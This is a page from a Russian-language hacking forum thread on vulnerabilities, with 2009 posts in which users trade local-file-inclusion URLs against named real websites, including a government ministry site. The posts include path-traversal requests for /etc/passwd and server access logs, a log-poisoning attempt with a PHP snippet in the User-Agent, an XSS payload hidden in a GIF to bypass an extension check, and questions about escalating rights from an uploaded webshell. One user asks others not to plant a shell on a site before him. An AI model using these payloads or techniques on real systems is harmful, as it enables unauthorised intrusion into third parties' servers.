ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7861  
Старый 29.06.2009, 00:47
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от DeepXhadow  
Несколько страниц был спор об этом инклуде...у меня вопрос остался

Полему при LFI не исполнился php код? Что я сделал не так?
ОМГ !!! ОМФГ!!!

Несколько страниц было объяснение одному господину, теперь второму нужно объяснить?

Я помоему тебе сразу ответил.

Это не инклуд там file()
вот мой пост:
https://forum.antichat.ru/showpost.php?p=1327108&postcount=7572

А если у кого-то там инклуд, пиши ему в ПМ, и пусть он тебе сам объясняет почему код не исполняется
 
Ответить с цитированием

  #7862  
Старый 29.06.2009, 09:28
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Помогите пожлауйста найти httpd.conf на этом инклуде

http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #7863  
Старый 29.06.2009, 09:52
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от nub-hacker  
Помогите пожлауйста найти httpd.conf на этом инклуде

http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
Код:
http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...
 
Ответить с цитированием

  #7864  
Старый 29.06.2009, 10:00
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Цитата:
Сообщение от DimOnOID  
Код:
http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...

спс, поставте ему +5.

ЗЫ плиз, не лейте шелл до меня, пожалуйста =)
 
Ответить с цитированием

  #7865  
Старый 29.06.2009, 11:23
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Ещё вопрос.
http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../var/log/httpd-access.log

вот лог. Что надо вписаь в инеткряк чтобы оставить запись в этом или еррор логе

=================
Вот ещё:

http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../var/log/httpd-access.log

но мне опять не везёт. php код не выполняется =(

вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"

Последний раз редактировалось nub-hacker; 29.06.2009 в 11:59..
 
Ответить с цитированием

  #7866  
Старый 29.06.2009, 12:13
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от nub-hacker  
но мне опять не везёт. php код не выполняется =(

вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=это%20не%20инкл уд

Warning: fopen(articles/это не инклуд):
 
Ответить с цитированием

  #7867  
Старый 29.06.2009, 12:15
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

PHP код:
function CheckExt($filename$ext)
{
    
$name strtolower($filename);
    if(
substr($namestrlen($name) -33) == $ext)
        return 
true;
    else
        return 
false;

Этот скрипт уязвим?(он проверяет расш. файла при заливке) Вот что я пытался сделать...
Поскоку скрипт проверяет токо название файла (что за расширение стоит в конце) то я попробывал залить gif а в гифе в конце файла (после ";" (без ковычек)) подставить это

PHP код:
<html><script>alert(//)</script></html> 
Подставил... Зашел через IE(картинка битая была при просмотре), в итоге алерта нету! В чем дело?
 
Ответить с цитированием

  #7868  
Старый 29.06.2009, 12:25
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Спс, jokester. А есть ли скрипт который сам проверят на дефолтные пути к конфигам и логам? в одной теме где дефолтные пути там есть атач от Elekt. Но архив битый, не открывается. Может гдето ещё есть?

ЗЫ можно в дальнеёшем просто joker?
 
Ответить с цитированием

  #7869  
Старый 29.06.2009, 18:54
Damned_one
Новичок
Регистрация: 24.11.2008
Сообщений: 24
Провел на форуме:
338992

Репутация: 44
По умолчанию

Есть вопрос по Xss уязвимостям: если фильтр фильтрует(ой..) \ заменяя его на html код
PHP код:
&#092; 
(c semicolons) так вот... возможно ли как то обойти эту фильтрацию?

Последний раз редактировалось Damned_one; 29.06.2009 в 18:58..
 
Ответить с цитированием

  #7870  
Старый 29.06.2009, 20:26
magichire
Новичок
Регистрация: 30.04.2009
Сообщений: 18
Провел на форуме:
97464

Репутация: 5
По умолчанию

Залил вебшелл, но у него права nobody, соответственно сильно не разгуляешься (интересует редактирование файлов). Можно ли как то получить права хотя бы юзверя в папку которого залит шелл, кроме как рутать сервак?

Система Freeebsd 6.2.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ